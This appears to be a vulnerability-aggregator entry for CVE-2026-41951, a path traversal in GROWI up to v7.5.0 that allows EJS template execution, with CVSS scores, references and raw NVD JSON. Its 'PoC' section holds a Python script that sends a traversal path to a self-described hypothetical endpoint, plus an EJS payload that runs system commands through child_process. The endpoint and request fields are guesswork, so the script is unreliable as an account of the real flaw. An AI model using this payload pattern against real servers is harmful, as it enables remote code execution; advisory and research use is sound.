CVE-2026-41951

Description

Path traversal vulnerability exists in GROWI v7.5.0 and earlier, which may allow an attacker to execute arbitrary EJS templates on the server when an email server is running in GROWI.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GROWI <= 7.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://localhost:3000/api/vuln/endpoint" # Hypothetical endpoint
session_cookie = "connect.sid=..." # Admin session cookie (High Privilege Required)

# EJS payload to execute system commands (e.g., 'id')
# The payload attempts to traverse directories and load a malicious template or inject code
malicious_template_path = "../../../../../../../../../tmp/malicious.ejs"

headers = {
    "Cookie": session_cookie,
    "Content-Type": "application/json"
}

# Data payload exploiting path traversal in the email server feature
payload = {
    "emailSettings": {
        "templatePath": malicious_template_path
    }
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check server for execution.")
        print("[+] Response:", response.text)
    else:
        print("[-] Failed to send request.")
except Exception as e:
    print(f"[-] Error: {e}")

# Note: A malicious.ejs file on the server would contain code like:
# <%= global.process.mainModule.require('child_process').execSync('whoami').toString() %>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41951
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41951
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41951/
[4] VulDB https://vuldb.com/cve/CVE-2026-41951
[5] https://growi.co.jp/news/44/
[6] https://jvn.jp/jp/JVN38788367/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41951", "sourceIdentifier": "[email protected]", "published": "2026-05-11T10:16:13.913", "lastModified": "2026-05-11T10:16:13.913", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path traversal vulnerability exists in GROWI v7.5.0 and earlier, which may allow an attacker to execute arbitrary EJS templates on the server when an email server is running in GROWI."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://growi.co.jp/news/44/", "source": "[email protected]"}, {"url": "https://jvn.jp/jp/JVN38788367/", "source": "[email protected]"}]}}